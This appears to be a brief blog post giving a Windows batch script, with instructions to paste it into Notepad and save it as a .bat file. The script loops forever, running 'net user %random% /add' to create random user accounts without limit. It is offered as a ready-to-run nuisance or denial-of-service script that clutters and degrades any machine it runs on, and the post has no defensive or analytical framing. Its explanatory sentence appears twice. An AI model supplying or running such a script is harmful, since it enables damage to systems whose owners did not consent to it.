Copy the command and paste in notepad and save as anything.bat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@echo off
:x
net user %random% /add //create user account
goto x
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This code would start creating windows user accounts whose names could be any random numbers.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This code would start creating windows user accounts whose names could be any random numbers.
0 comments:
Post a Comment